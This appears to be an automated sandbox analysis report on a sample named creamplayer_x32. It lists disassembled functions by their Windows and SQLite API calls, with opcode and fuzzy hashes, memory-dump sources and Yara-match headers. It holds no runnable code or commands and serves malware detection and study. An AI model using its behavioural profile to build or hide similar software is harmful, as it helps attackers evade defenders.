• API ID: H_prolog$_malloc
• String ID:
• API String ID: 4254904621-0
• Opcode ID: c24633032e929df14316546960edca0ddaa71371b9fbd65d437ed068208f1336
• Instruction ID: e58433f83b8bdacae2a95ccee5053b55aa72f44e86a94e63ef8b03ac32a2ef6f
• Opcode Fuzzy Hash: c24633032e929df14316546960edca0ddaa71371b9fbd65d437ed068208f1336
• Instruction Fuzzy Hash: 7CE0C270A04105ABDF0CEF68DC0877E77A2EB84704F0041AEBC09E2340EF709D008A20
APIs
  • Part of subcall function 02D548BA: __getptd_noexit.LIBCMT ref: 02D548BB
  • Part of subcall function 02D548BA: __amsg_exit.LIBCMT ref: 02D548C8
  • Part of subcall function 02D52493: __getptd_noexit.LIBCMT ref: 02D52497
  • Part of subcall function 02D52493: __freeptd.LIBCMT ref: 02D524B1
  • Part of subcall function 02D52493: RtlExitUserThread.NTDLL(?,00000000,?,02D52473,00000000), ref: 02D524BA
• __XcptFilter.LIBCMT ref: 02D5247F
  • Part of subcall function 02D57944: __getptd_noexit.LIBCMT ref: 02D57948
Memory Dump Source
• Source File: 00000005.00000002.2616558941.0000000002D41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D41000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_2d41000_creamplayer_x32.jbxd
Yara matches
Similarity
• API ID: __getptd_noexit$ExitFilterThreadUserXcpt__amsg_exit__freeptd
• String ID:
• API String ID: 1405322794-0
• Opcode ID: 8ceaf16a77eba51b27749d4e1da3199ea28528d8e8f3ba2a1189d110405cf3d7
• Instruction ID: d43a874d0d38e1ef4ca1522a6d8ff7637b77c63e529d38bd5383f544296f4a54
• Opcode Fuzzy Hash: 8ceaf16a77eba51b27749d4e1da3199ea28528d8e8f3ba2a1189d110405cf3d7
• Instruction Fuzzy Hash: 33E0ECB19046109FFF08ABA0E909E2D7BA6EF04711F200488E9029B361DAB89D44DE31
APIs
Memory Dump Source
• Source File: 00000005.00000002.2614349634.000000000040B000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.2614349634.0000000000400000.00000040.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_creamplayer_x32.jbxd
Similarity
• API ID: ManagerOpen
• String ID:
• API String ID: 1889721586-0
• Opcode ID: faa819060fe9011425c503b783bb8b7d9f2085a3bf2ea5847d6f517437795d43
• Instruction ID: 91e4a2d6cc8ff6e64853bb2de22b9c9adcb6bc17cc58e2c5d35efb3fa643ddba
• Opcode Fuzzy Hash: faa819060fe9011425c503b783bb8b7d9f2085a3bf2ea5847d6f517437795d43
• Instruction Fuzzy Hash: 3EC08CB0808105FDC7400A904FD8D3B24AC69083093B0407BA10BB00C0C5BC598AB52E
APIs
Memory Dump Source
• Source File: 00000005.00000002.2614349634.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.2614349634.000000000040B000.00000040.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_creamplayer_x32.jbxd
Similarity
• API ID: CopyFile
• String ID:
• API String ID: 1304948518-0
• Opcode ID: 1f4538b9efa5d3dbcc4b3440fc9bc949f63a61dcb54361b095040e23360b1ed7
• Instruction ID: 944eb226a14a80c6989878ba7bdf0818dbfa01dfd1088787936cfd16164d646e
• Opcode Fuzzy Hash: 1f4538b9efa5d3dbcc4b3440fc9bc949f63a61dcb54361b095040e23360b1ed7
• Instruction Fuzzy Hash: B9C02B309000049FCA04CF948D99FD173BC4305300F0245B2713AF31C0CB38564E8B2E
APIs
• RegQueryValueExA.KERNEL32(?), ref: 0040D057
Memory Dump Source
• Source File: 00000005.00000002.2614349634.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.2614349634.000000000040B000.00000040.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_creamplayer_x32.jbxd
Similarity
• API ID: QueryValue
• String ID:
• API String ID: 3660427363-0
• Opcode ID: 393418cfec2289c833a14ba24c505e0ad16217496d0d83ccf94d0a210425da24
• Instruction ID: 04cb0de4d9de21ebb5c8be7db53efb7bc9d25a7394cb7521ab8b4f49fcf80e29
• Opcode Fuzzy Hash: 393418cfec2289c833a14ba24c505e0ad16217496d0d83ccf94d0a210425da24
• Instruction Fuzzy Hash: 5CC00230E0451AEACF115FA0890456EBB72BB84340B21487AD962B21B0DB79961ABA5A
APIs
Memory Dump Source
• Source File: 00000005.00000002.2614349634.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.2614349634.000000000040B000.00000040.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_creamplayer_x32.jbxd
Similarity
• API ID: CreateDirectory
• String ID:
• API String ID: 4241100979-0
• Opcode ID: 1307668f9107fcc23f1f7957859d2888dca589b9c1620b5bbf5ee4ab4fa42f6a
• Instruction ID: 87b4bb1b4ef5a525859fef833b6a268e770200f8356ad07457f62a84397421b8
• Opcode Fuzzy Hash: 1307668f9107fcc23f1f7957859d2888dca589b9c1620b5bbf5ee4ab4fa42f6a
• Instruction Fuzzy Hash: 94C09B3544D534D6D5516BD04F4DDEDB16C5F05300B6181BBB143700D1CBFD054A5AAF
APIs
Memory Dump Source
• Source File: 00000005.00000002.2614349634.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.2614349634.000000000040B000.00000040.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_creamplayer_x32.jbxd
Similarity
• API ID: CopyFile
• String ID:
• API String ID: 1304948518-0
• Opcode ID: 378b674e3c1190c0e8b2dd244db47c3ee3f10419fb34aa36e2eaa3bbac0a3bff
• Instruction ID: adccea78fc68e58af53bcf9c5c641eacc21f61f834cbdd7054748269b0f988af
• Opcode Fuzzy Hash: 378b674e3c1190c0e8b2dd244db47c3ee3f10419fb34aa36e2eaa3bbac0a3bff
• Instruction Fuzzy Hash: B6900220249105AEE2140B215E4865526945504B41315443D5447E0060DA38C0496519
APIs
Memory Dump Source
• Source File: 00000005.00000002.2614349634.000000000040B000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.2614349634.0000000000400000.00000040.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_creamplayer_x32.jbxd
Similarity
• API ID: Create
• String ID:
• API String ID: 2289755597-0
• Opcode ID: 4cba9ef6f2742578bb1ab532942fb0a2a16bc540f47c5a6fe864ad65f7726e2b
• Instruction ID: a88dc8968e50e464ca2c8c960636948ab91f2b078dfb4b7c76ec5da4f8d64f8e
• Opcode Fuzzy Hash: 4cba9ef6f2742578bb1ab532942fb0a2a16bc540f47c5a6fe864ad65f7726e2b
• Instruction Fuzzy Hash: 339002602445019BD2000A215A187152554660475571144395447E2060DA3480059919
APIs
Memory Dump Source
• Source File: 00000005.00000002.2616558941.0000000002D78000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D78000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_2d78000_creamplayer_x32.jbxd
Similarity
• API ID: CreateThread
• String ID:
• API String ID: 2422867632-0
• Opcode ID: 7d46506bad7a1db2616a0b56886a232d532b4501777212f73592975f9aa5807b
• Instruction ID: ba21a7f1fa838a84e23ee4bf11e23e1f2c38a1bc76e1f81c5cbab30a793903e8
• Opcode Fuzzy Hash: 7d46506bad7a1db2616a0b56886a232d532b4501777212f73592975f9aa5807b
• Instruction Fuzzy Hash: 5690027086E402CA57442650602D7247620A9001027A04600F0C7503C0D620DC54C561
APIs
  • Part of subcall function 02D50610: OpenEventA.KERNEL32(00100002,00000000,00000000,1CD20891), ref: 02D506B0
  • Part of subcall function 02D50610: CloseHandle.KERNEL32(00000000), ref: 02D506C5
  • Part of subcall function 02D50610: ResetEvent.KERNEL32(00000000,1CD20891), ref: 02D506CF
  • Part of subcall function 02D50610: CloseHandle.KERNEL32(00000000,1CD20891), ref: 02D50704
• TlsSetValue.KERNEL32(00000029,?), ref: 02D511AA
Memory Dump Source
• Source File: 00000005.00000002.2616558941.0000000002D41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D41000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_2d41000_creamplayer_x32.jbxd
Yara matches
Similarity
• API ID: CloseEventHandle$OpenResetValue
• String ID:
• API String ID: 1556185888-0
• Opcode ID: 2fc989785c1d149f895afc60d138e476e77f36e67e37af2a8b3c3260ad600902
• Instruction ID: 087900ba5674aaf82d55e3169b4b19ae4a6a6ad9329feae12c0eb3bf0c2090c3
• Opcode Fuzzy Hash: 2fc989785c1d149f895afc60d138e476e77f36e67e37af2a8b3c3260ad600902
• Instruction Fuzzy Hash: C8018F71A44254ABDB10CF58EC09F5ABBA8FB09771F10476AF829E3380D775AD048AA0
APIs
Memory Dump Source
• Source File: 00000005.00000002.2614349634.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.2614349634.000000000040B000.00000040.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_creamplayer_x32.jbxd
Similarity
• API ID: Sleep
• String ID:
• API String ID: 3472027048-0
• Opcode ID: 25b756e13b7b953d11ee11ed40973e58cad1eba1a31d51ce14ee0e3968ba03af
• Instruction ID: 73357d582b849376200fcb71df28cb45d3a03518a5f9e8bb9ec57df5c49caa49
• Opcode Fuzzy Hash: 25b756e13b7b953d11ee11ed40973e58cad1eba1a31d51ce14ee0e3968ba03af
• Instruction Fuzzy Hash: B7D0121148D7825ED62626245D182D91B906B06370B322667D8B3EA0E7C75D81C7555E
APIs
• sqlite3_malloc.SQLITE3 ref: 609674C6
  • Part of subcall function 60916FBA: sqlite3_initialize.SQLITE3(60912743,?,?,?,?,?,?,?,?,?,?,?,?,?,?,609129E5), ref: 60916FC4
  • Part of subcall function 6095ECA6: sqlite3_mprintf.SQLITE3 ref: 6095ED06
  • Part of subcall function 6095ECA6: sqlite3_prepare_v2.SQLITE3 ref: 6095ED8D
  • Part of subcall function 6095ECA6: sqlite3_free.SQLITE3 ref: 6095ED9B
• sqlite3_step.SQLITE3 ref: 6096755A
• sqlite3_malloc.SQLITE3 ref: 6096783A
• sqlite3_bind_int64.SQLITE3 ref: 609678A8
• sqlite3_column_bytes.SQLITE3 ref: 609678E8
• sqlite3_column_blob.SQLITE3 ref: 60967901
• sqlite3_column_int64.SQLITE3 ref: 6096791A
• sqlite3_column_int64.SQLITE3 ref: 60967931
• sqlite3_column_int64.SQLITE3 ref: 60967950
• sqlite3_step.SQLITE3 ref: 609679C3
• sqlite3_bind_int64.SQLITE3 ref: 60967AA9
• sqlite3_step.SQLITE3 ref: 60967AB4
• sqlite3_column_int.SQLITE3 ref: 60967AC7
• sqlite3_reset.SQLITE3 ref: 60967AD4
• sqlite3_bind_int.SQLITE3 ref: 60967B89
• sqlite3_step.SQLITE3 ref: 60967B94
• sqlite3_column_int64.SQLITE3 ref: 60967BB0
• sqlite3_column_int64.SQLITE3 ref: 60967BCF
• sqlite3_column_int64.SQLITE3 ref: 60967BE6
• sqlite3_column_bytes.SQLITE3 ref: 60967C05
• sqlite3_column_blob.SQLITE3 ref: 60967C1E
  • Part of subcall function 6095ECA6: sqlite3_mprintf.SQLITE3 ref: 6095ED50
• sqlite3_bind_int64.SQLITE3 ref: 60967C72
• sqlite3_step.SQLITE3 ref: 60967C7D
• memcmp.MSVCRT ref: 60967D4C
• sqlite3_free.SQLITE3 ref: 60967D69
• sqlite3_free.SQLITE3 ref: 60967D74
• sqlite3_free.SQLITE3 ref: 60967FF7
• sqlite3_free.SQLITE3 ref: 60968002
  • Part of subcall function 609634F0: sqlite3_blob_reopen.SQLITE3 ref: 60963510
  • Part of subcall function 609634F0: sqlite3_blob_bytes.SQLITE3 ref: 609635A3
  • Part of subcall function 609634F0: sqlite3_malloc.SQLITE3 ref: 609635BB
  • Part of subcall function 609634F0: sqlite3_blob_read.SQLITE3 ref: 60963602
  • Part of subcall function 609634F0: sqlite3_free.SQLITE3 ref: 60963621
• sqlite3_reset.SQLITE3 ref: 60967C93
  • Part of subcall function 60941C40: sqlite3_mutex_enter.SQLITE3 ref: 60941C58
  • Part of subcall function 60941C40: sqlite3_mutex_leave.SQLITE3 ref: 60941CBE
• sqlite3_reset.SQLITE3 ref: 60967CA7
• sqlite3_reset.SQLITE3 ref: 60968035
• sqlite3_bind_int64.SQLITE3 ref: 60967B72
  • Part of subcall function 60925686: sqlite3_mutex_leave.SQLITE3 ref: 609256D3
• sqlite3_bind_int64.SQLITE3 ref: 6096809D
• sqlite3_bind_int64.SQLITE3 ref: 609680C6
• sqlite3_step.SQLITE3 ref: 609680D1
• sqlite3_column_int.SQLITE3 ref: 609680F3
• sqlite3_reset.SQLITE3 ref: 60968104
• sqlite3_step.SQLITE3 ref: 60968139
• sqlite3_column_int64.SQLITE3 ref: 60968151
• sqlite3_reset.SQLITE3 ref: 6096818A
  • Part of subcall function 6095ECA6: sqlite3_mprintf.SQLITE3 ref: 6095ED2B
  • Part of subcall function 6095ECA6: sqlite3_bind_value.SQLITE3 ref: 6095EDDF
• sqlite3_reset.SQLITE3 ref: 609679E9
  • Part of subcall function 609160CD: sqlite3_realloc.SQLITE3 ref: 609160EF
• sqlite3_column_bytes.SQLITE3 ref: 60967587
  • Part of subcall function 6091D5DC: sqlite3_value_bytes.SQLITE3 ref: 6091D5F4
• sqlite3_column_blob.SQLITE3 ref: 60967572
  • Part of subcall function 6091D57E: sqlite3_value_blob.SQLITE3 ref: 6091D596
• sqlite3_reset.SQLITE3 ref: 609675B7
• sqlite3_bind_int.SQLITE3 ref: 60967641
• sqlite3_step.SQLITE3 ref: 6096764C
• sqlite3_column_int64.SQLITE3 ref: 6096766E
• sqlite3_reset.SQLITE3 ref: 6096768B
• sqlite3_bind_int.SQLITE3 ref: 6096754F
  • Part of subcall function 609256E5: sqlite3_bind_int64.SQLITE3 ref: 60925704
• sqlite3_bind_int.SQLITE3 ref: 609690B2
• sqlite3_bind_blob.SQLITE3 ref: 609690DB
• sqlite3_step.SQLITE3 ref: 609690E6
• sqlite3_reset.SQLITE3 ref: 609690F1
• sqlite3_free.SQLITE3 ref: 60969102
• sqlite3_free.SQLITE3 ref: 6096910D
Strings
Memory Dump Source
• Source File: 00000005.00000002.2618393448.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
• Associated: 00000005.00000002.2618306074.0000000060900000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.2618567746.000000006096E000.00000008.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.2618594457.000000006096F000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.2618671124.000000006097B000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.2618784780.000000006097D000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.2618824798.0000000060980000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_60900000_creamplayer_x32.jbxd
Similarity
• API ID: sqlite3_reset$sqlite3_step$sqlite3_column_int64sqlite3_free$sqlite3_bind_int64$sqlite3_bind_int$sqlite3_column_blobsqlite3_column_bytessqlite3_mallocsqlite3_mprintf$sqlite3_column_intsqlite3_mutex_leave$memcmpsqlite3_bind_blobsqlite3_bind_valuesqlite3_blob_bytessqlite3_blob_readsqlite3_blob_reopensqlite3_initializesqlite3_mutex_entersqlite3_prepare_v2sqlite3_reallocsqlite3_value_blobsqlite3_value_bytes
• String ID: $d
• API String ID: 2451604321-2084297493
• Opcode ID: 8a4e51d2763d1baa8146902d495da2ef892242416c9706ebfa3093aedc646825
• Instruction ID: 6b7ea73e19bc996eb6a422b8fcf26663d3cb25e4dd91ceba81a4d6a678ae72ab
• Opcode Fuzzy Hash: 8a4e51d2763d1baa8146902d495da2ef892242416c9706ebfa3093aedc646825
• Instruction Fuzzy Hash: 2CF2CF74A152288FDB54CF68C980B9EBBF2BF69304F1185A9E888A7341D774ED85CF41
APIs
• sqlite3_value_text.SQLITE3 ref: 6096A64C
• sqlite3_value_bytes.SQLITE3 ref: 6096A656
• sqlite3_strnicmp.SQLITE3 ref: 6096A682
• sqlite3_strnicmp.SQLITE3 ref: 6096A6BC
• sqlite3_mprintf.SQLITE3 ref: 6096A6F9
• sqlite3_malloc.SQLITE3 ref: 6096A754
• sqlite3_step.SQLITE3 ref: 6096A969
• sqlite3_free.SQLITE3 ref: 6096A9AC
• sqlite3_finalize.SQLITE3 ref: 6096A9BB
• sqlite3_strnicmp.SQLITE3 ref: 6096B04A
  • Part of subcall function 6096A38C: sqlite3_bind_int.SQLITE3 ref: 6096A3DE
  • Part of subcall function 6096A38C: sqlite3_step.SQLITE3 ref: 6096A435
  • Part of subcall function 6096A38C: sqlite3_reset.SQLITE3 ref: 6096A445
• sqlite3_value_int.SQLITE3 ref: 6096B241
• sqlite3_malloc.SQLITE3 ref: 6096B270
• sqlite3_bind_null.SQLITE3 ref: 6096B2DF
• sqlite3_step.SQLITE3 ref: 6096B2EA
• sqlite3_reset.SQLITE3 ref: 6096B2F5
• sqlite3_value_int.SQLITE3 ref: 6096B43B
• sqlite3_value_text.SQLITE3 ref: 6096B530
• sqlite3_value_bytes.SQLITE3 ref: 6096B576
• sqlite3_free.SQLITE3 ref: 6096B5F4
Strings
Memory Dump Source
• Source File: 00000005.00000002.2618393448.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
• Associated: 00000005.00000002.2618306074.0000000060900000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.2618567746.000000006096E000.00000008.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.2618594457.000000006096F000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.2618671124.000000006097B000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.2618784780.000000006097D000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.2618824798.0000000060980000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_60900000_creamplayer_x32.jbxd
Similarity
• API ID: sqlite3_stepsqlite3_strnicmp$sqlite3_freesqlite3_mallocsqlite3_resetsqlite3_value_bytessqlite3_value_intsqlite3_value_text$sqlite3_bind_intsqlite3_bind_nullsqlite3_finalizesqlite3_mprintf
• String ID: optimize
• API String ID: 1540667495-3797040228
• Opcode ID: ab382b16e3f59fac809a38361d516dac1e6c4c02a096abfb60effccae4f38c9b
• Instruction ID: 15d53f9c7948a495e2c6926a79545eea34293df74e7a3e63ea56b3727437b729
• Opcode Fuzzy Hash: ab382b16e3f59fac809a38361d516dac1e6c4c02a096abfb60effccae4f38c9b
• Instruction Fuzzy Hash: 54B2F670A142198FEB14DF68C890B9DBBF6BF68304F1085A9E889AB351E774DD85CF41
APIs
• sqlite3_finalize.SQLITE3 ref: 60966178
• sqlite3_free.SQLITE3 ref: 60966183
• sqlite3_value_numeric_type.SQLITE3 ref: 609661AE
• sqlite3_value_numeric_type.SQLITE3 ref: 609661DE
• sqlite3_value_text.SQLITE3 ref: 60966236
• sqlite3_value_int.SQLITE3 ref: 60966274
• memcmp.MSVCRT ref: 6096639E
  • Part of subcall function 60940A5B: sqlite3_malloc.SQLITE3 ref: 60940AA1
  • Part of subcall function 60940A5B: sqlite3_free.SQLITE3 ref: 60940C1D
• sqlite3_mprintf.SQLITE3 ref: 60966B51
• sqlite3_mprintf.SQLITE3 ref: 60966B7D
  • Part of subcall function 609296AA: sqlite3_initialize.SQLITE3 ref: 609296B0
  • Part of subcall function 609296AA: sqlite3_vmprintf.SQLITE3 ref: 609296CA
Strings
Memory Dump Source
• Source File: 00000005.00000002.2618393448.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
• Associated: 00000005.00000002.2618306074.0000000060900000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.2618567746.000000006096E000.00000008.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.2618594457.000000006096F000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.2618671124.000000006097B000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.2618784780.000000006097D000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.2618824798.0000000060980000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_60900000_creamplayer_x32.jbxd
Similarity
• API ID: sqlite3_freesqlite3_mprintfsqlite3_value_numeric_type$memcmpsqlite3_finalizesqlite3_initializesqlite3_mallocsqlite3_value_intsqlite3_value_textsqlite3_vmprintf
• String ID: ASC$DESC$x
• API String ID: 4082667235-1162196452
• Opcode ID: 7264e4280a4ba67b830c3238f8418230a53be4a89f04bb086879d88682624c0f
• Instruction ID: 01f4316cc9c65235d83944c747b96ccca9397e1276bdc6c450b31a73d7ca280a
• Opcode Fuzzy Hash: 7264e4280a4ba67b830c3238f8418230a53be4a89f04bb086879d88682624c0f
• Instruction Fuzzy Hash: AD921274A14319CFEB10CFA9C99079DBBB6BF69304F20816AD858AB342D774E985CF41
                                                                                                    APIs
                                                                                                    • sqlite3_bind_int64.SQLITE3 ref: 6096882B
                                                                                                    • sqlite3_bind_int.SQLITE3 ref: 60968842
                                                                                                    • sqlite3_step.SQLITE3 ref: 6096884D
                                                                                                    • sqlite3_reset.SQLITE3 ref: 60968858
                                                                                                    • sqlite3_bind_int64.SQLITE3 ref: 60968907
                                                                                                    • sqlite3_bind_int.SQLITE3 ref: 60968924
                                                                                                    • sqlite3_step.SQLITE3 ref: 6096892F
                                                                                                    • sqlite3_column_blob.SQLITE3 ref: 60968947
                                                                                                    • sqlite3_column_bytes.SQLITE3 ref: 6096895C
                                                                                                    • sqlite3_column_int64.SQLITE3 ref: 60968975
                                                                                                    • sqlite3_reset.SQLITE3 ref: 609689B0
                                                                                                      • Part of subcall function 609634F0: sqlite3_blob_reopen.SQLITE3 ref: 60963510
                                                                                                      • Part of subcall function 609634F0: sqlite3_blob_bytes.SQLITE3 ref: 609635A3
                                                                                                      • Part of subcall function 609634F0: sqlite3_malloc.SQLITE3 ref: 609635BB
                                                                                                      • Part of subcall function 609634F0: sqlite3_blob_read.SQLITE3 ref: 60963602
                                                                                                      • Part of subcall function 609634F0: sqlite3_free.SQLITE3 ref: 60963621
                                                                                                    • sqlite3_free.SQLITE3 ref: 60968A68
                                                                                                    • sqlite3_bind_int64.SQLITE3 ref: 60968B00
                                                                                                    • sqlite3_bind_int64.SQLITE3 ref: 60968B2D
                                                                                                    • sqlite3_step.SQLITE3 ref: 60968B38
                                                                                                    • sqlite3_reset.SQLITE3 ref: 60968B43
                                                                                                    • sqlite3_bind_int64.SQLITE3 ref: 60968B9F
                                                                                                    • sqlite3_bind_blob.SQLITE3 ref: 60968BC8
                                                                                                    • sqlite3_bind_int64.SQLITE3 ref: 60968BEF
                                                                                                    • sqlite3_bind_int.SQLITE3 ref: 60968C0C
                                                                                                    • sqlite3_step.SQLITE3 ref: 60968C17
                                                                                                    • sqlite3_reset.SQLITE3 ref: 60968C22
                                                                                                    • sqlite3_free.SQLITE3 ref: 60968C2F
                                                                                                    • sqlite3_free.SQLITE3 ref: 60968C3A
                                                                                                      • Part of subcall function 60916390: sqlite3_free.SQLITE3 ref: 609164E9
                                                                                                      • Part of subcall function 60916390: sqlite3_free.SQLITE3 ref: 609164F4
                                                                                                      • Part of subcall function 6095F772: sqlite3_bind_int64.SQLITE3 ref: 6095F7AC
                                                                                                      • Part of subcall function 6095F772: sqlite3_bind_blob.SQLITE3 ref: 6095F7D5
                                                                                                      • Part of subcall function 6095F772: sqlite3_step.SQLITE3 ref: 6095F7E0
                                                                                                      • Part of subcall function 6095F772: sqlite3_reset.SQLITE3 ref: 6095F7EB
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2618393448.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                                     • Associated: 00000005.00000002.2618306074.0000000060900000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                     • Associated: 00000005.00000002.2618567746.000000006096E000.00000008.00000001.01000000.0000000A.sdmp
                                                                                                     • Associated: 00000005.00000002.2618594457.000000006096F000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                     • Associated: 00000005.00000002.2618671124.000000006097B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                     • Associated: 00000005.00000002.2618784780.000000006097D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                     • Associated: 00000005.00000002.2618824798.0000000060980000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_60900000_creamplayer_x32.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: sqlite3_bind_int64$sqlite3_free$sqlite3_resetsqlite3_step$sqlite3_bind_int$sqlite3_bind_blob$sqlite3_blob_bytessqlite3_blob_readsqlite3_blob_reopensqlite3_column_blobsqlite3_column_bytessqlite3_column_int64sqlite3_malloc
                                                                                                    • String ID:
                                                                                                    • API String ID: 2526640242-0
                                                                                                    • Opcode ID: 80c4178694f9100467d9f8914e06a53f74e1fc263bd09a9052fbc3a5e85adfd3
                                                                                                    • Instruction ID: ecb2fadc30329ad4410b738d56806f6ecd0ac298638076f7c65242d8805d2ed1
                                                                                                    • Opcode Fuzzy Hash: 80c4178694f9100467d9f8914e06a53f74e1fc263bd09a9052fbc3a5e85adfd3
                                                                                                    • Instruction Fuzzy Hash: A0D1C2B4A153189FDB14DF68C884B8EBBF2BFA9304F118599E888A7344E774D985CF41
                                                                                                    APIs
                                                                                                    • sqlite3_bind_int64.SQLITE3(?,?), ref: 609693A5
                                                                                                    • sqlite3_step.SQLITE3(?,?), ref: 609693B0
                                                                                                    • sqlite3_column_int64.SQLITE3(?,?), ref: 609693DC
                                                                                                      • Part of subcall function 6096A2BD: sqlite3_bind_int64.SQLITE3 ref: 6096A322
                                                                                                      • Part of subcall function 6096A2BD: sqlite3_step.SQLITE3 ref: 6096A32D
                                                                                                      • Part of subcall function 6096A2BD: sqlite3_column_int.SQLITE3 ref: 6096A347
                                                                                                      • Part of subcall function 6096A2BD: sqlite3_reset.SQLITE3 ref: 6096A354
                                                                                                    • sqlite3_reset.SQLITE3(?,?), ref: 609693F3
                                                                                                    • sqlite3_malloc.SQLITE3(?), ref: 60969561
                                                                                                    • sqlite3_malloc.SQLITE3(?), ref: 6096958D
                                                                                                    • sqlite3_step.SQLITE3(?), ref: 609695D2
                                                                                                    • sqlite3_column_int64.SQLITE3(?), ref: 609695EA
                                                                                                    • sqlite3_reset.SQLITE3(?), ref: 60969604
                                                                                                    • sqlite3_realloc.SQLITE3(?), ref: 609697D0
                                                                                                    • sqlite3_realloc.SQLITE3(?), ref: 609698A9
                                                                                                      • Part of subcall function 609129D5: sqlite3_initialize.SQLITE3(?,?,?,60915F55,?,?,?,?,?,?,00000000,?,?,?,60915FE2,00000000), ref: 609129E0
                                                                                                    • sqlite3_bind_int64.SQLITE3(?,?), ref: 609699B8
                                                                                                    • sqlite3_bind_int64.SQLITE3(?), ref: 6096934D
                                                                                                      • Part of subcall function 60925686: sqlite3_mutex_leave.SQLITE3 ref: 609256D3
                                                                                                    • sqlite3_bind_int64.SQLITE3(?,?), ref: 60969A6A
                                                                                                    • sqlite3_step.SQLITE3(?,?), ref: 60969A75
                                                                                                    • sqlite3_reset.SQLITE3(?,?), ref: 60969A80
                                                                                                    • sqlite3_free.SQLITE3(?), ref: 60969D41
                                                                                                    • sqlite3_free.SQLITE3(?), ref: 60969D4C
                                                                                                    • sqlite3_free.SQLITE3(?), ref: 60969D5B
                                                                                                      • Part of subcall function 6095ECA6: sqlite3_mprintf.SQLITE3 ref: 6095ED06
                                                                                                      • Part of subcall function 6095ECA6: sqlite3_prepare_v2.SQLITE3 ref: 6095ED8D
                                                                                                      • Part of subcall function 6095ECA6: sqlite3_free.SQLITE3 ref: 6095ED9B
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2618393448.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                                     • Associated: 00000005.00000002.2618306074.0000000060900000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                     • Associated: 00000005.00000002.2618567746.000000006096E000.00000008.00000001.01000000.0000000A.sdmp
                                                                                                     • Associated: 00000005.00000002.2618594457.000000006096F000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                     • Associated: 00000005.00000002.2618671124.000000006097B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                     • Associated: 00000005.00000002.2618784780.000000006097D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                     • Associated: 00000005.00000002.2618824798.0000000060980000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_60900000_creamplayer_x32.jbxd
                                                                                                    Similarity
